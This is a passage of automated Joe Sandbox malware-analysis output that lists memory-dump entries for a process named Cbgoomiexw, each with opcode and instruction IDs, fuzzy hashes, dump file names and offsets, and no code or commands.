                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcb00df4fb34f7126c629495a38211fedc1e5eeca59cd7721845a5c72dc39566
                                          • Instruction ID: 8f65f5b8d4d28a6c12fb2b2fbac1fb58a27f6a0091ac38d1811def9699237c88
                                          • Opcode Fuzzy Hash: bcb00df4fb34f7126c629495a38211fedc1e5eeca59cd7721845a5c72dc39566
                                          • Instruction Fuzzy Hash: D1F0153490820CEFCB40DF98D8409ACBBB5EB48310F10C099ED1857350D732AA61EF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 968ee8aad88bfd57834b2a3f628e4bb77b3be0b4ae79e2f6b48fa08530dbd4e2
                                          • Instruction ID: 562f519434b25a1da8b58b190ae6b9299b519062919692a2e18a90018fa570d6
                                          • Opcode Fuzzy Hash: 968ee8aad88bfd57834b2a3f628e4bb77b3be0b4ae79e2f6b48fa08530dbd4e2
                                          • Instruction Fuzzy Hash: 84F01535904208EFCB45DFA4C8409ACBBB5EB48310F10C09AA91456251C632AA61EF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: c3c95b2b0700994b87e663a112f3afd58d5a61fea7e22e117902eb0fa2745ed8
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 70E0ED74E0820CEFCB94DFA8D5416ADFBF4EB48314F10C0AA981993340D6359A51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: 265e8d0e22fdd7deea8981cd175abd897f71707c1c2ed66573b594571ef262ee
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 07E0ED74D04208EFCB84DFA9D5416ADFBF5EB48310F10C1AA982893341D6359E51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: d14fd80d86b9139448531d314aa631bdac5dd111cbe70972f4e7888fbaa8ed20
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 5DE0ED74D04208EFCB84DFA8D4416ADFBF4FB8C310F10C0AA985893341D6359A51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: 4794fd255304ae7b8fde2ee77ad327596fb66a95948b5655954029852822f4c4
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: D2E0ED74D08208EFCB88DFA8D441AADFBF4EB88310F10C0AA981893340D6369E51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 734b6b9a6845c05401b97d58544ef1bd88de94564e58fa907385505c5cc27e3a
                                          • Instruction ID: 8fdf67e13fc38d16e797560f5f1aee43b7df62479cbe38603fdb4e08f1e8d59f
                                          • Opcode Fuzzy Hash: 734b6b9a6845c05401b97d58544ef1bd88de94564e58fa907385505c5cc27e3a
                                          • Instruction Fuzzy Hash: 9FF05230A18214CFE754EF68DCA8B9ABBB6EF85341F0004D9911AAB284CB302A80CF50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction ID: 64812a16677cd1c0343702c7e60a71cff336da02a89121a7ce081e064283ffa0
                                          • Opcode Fuzzy Hash: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction Fuzzy Hash: 9DE0E574E04208EFCB84DFA8D4416ACBBF4EB48300F10C0AAA81897340D735AA41CF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction ID: d0541058f014a097f8210db595d765b6786c566053159036bc92b9e540e3feb2
                                          • Opcode Fuzzy Hash: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction Fuzzy Hash: 11E01A74E08208EFCB84DFA8D8416ACFBF8EB48310F10C0AA981893341D735AE41CF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction ID: d789573e57a728349b3bedc27381c7e5cdedfeecf437f1e1ed9cb2232741f1e8
                                          • Opcode Fuzzy Hash: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction Fuzzy Hash: 51E0E574D08208EFCB44DFA9D4419ACFBB4EB48310F10C1AA985857351C635AA91DF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction ID: 210faf95001ad2c9c86a9c6fd02e241c81acb5d705e88e28cc1bf44d6bddb11e
                                          • Opcode Fuzzy Hash: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction Fuzzy Hash: DDE0E574D08208EFCB44DFA9D4419BCFBF4EB48310F14C0AA9C5857341C635AA91DF94
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a72ce418b17853097659e9ba82f3a7f542c26f145593abacdfcc2243f6cbb358
                                          • Instruction ID: ad57968389e82a324d391202cfd6bfa7b0904ac64628bfb7734cb59f08034deb
                                          • Opcode Fuzzy Hash: a72ce418b17853097659e9ba82f3a7f542c26f145593abacdfcc2243f6cbb358
                                          • Instruction Fuzzy Hash: DDE04F75908218EBC744DFA4D4419ADBBB8EB49310F10C0ADD85957381CA329A52DB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63cce8192b7da5ca5de7a5d221619a491ad06516bdab69527a612de9b4ee7675
                                          • Instruction ID: 8c9123b6f4b678dca75f758531c409da216572a1815f477e49701f3af42edee0
                                          • Opcode Fuzzy Hash: 63cce8192b7da5ca5de7a5d221619a491ad06516bdab69527a612de9b4ee7675
                                          • Instruction Fuzzy Hash: C9D05E316443349BEBE06AB09D41BA673DC9F46B11F100469EA15AF2D0DAB2E851C7D1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54ee2e5722095a8b33e3c5cd942b0b9bd63287fcc00b6c6f39a96c376c41aaec
                                          • Instruction ID: 4126539754db6829d89b825d8842a57145b8a79eb752e4037334e3b318280149
                                          • Opcode Fuzzy Hash: 54ee2e5722095a8b33e3c5cd942b0b9bd63287fcc00b6c6f39a96c376c41aaec
                                          • Instruction Fuzzy Hash: 55F03070E00328DFDB54DF14E495B9DBBB2EB46300F1084DAD206A3344CB305E808FA2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f285cefa1fab7f81801de8773bdad0ce2d99a82570ed0f14ef7518fcf9fb1d0
                                          • Instruction ID: 2c2f362ff7785e4648a5bc0f15a8240657958fcb468d4c54fe0d5ad98c481f4e
                                          • Opcode Fuzzy Hash: 4f285cefa1fab7f81801de8773bdad0ce2d99a82570ed0f14ef7518fcf9fb1d0
                                          • Instruction Fuzzy Hash: B3E0DF3080E244EFC301CFB4DA165AC7F30AB0B305F0481CAC00567251C6340A94CFA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9da1fdd7a0598f451908beb5c6d59210fb5ddc1df984114e324809aea0a63f69
                                          • Instruction ID: 19d631cc2a63b091a375f185e742f692a4c8e94155dcb9b3be13bb4b7a8a2623
                                          • Opcode Fuzzy Hash: 9da1fdd7a0598f451908beb5c6d59210fb5ddc1df984114e324809aea0a63f69
                                          • Instruction Fuzzy Hash: 8BD0123A30A2914FC752DB75F8409887FB09A5652131441EFD0C8CB522C1115849C750
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false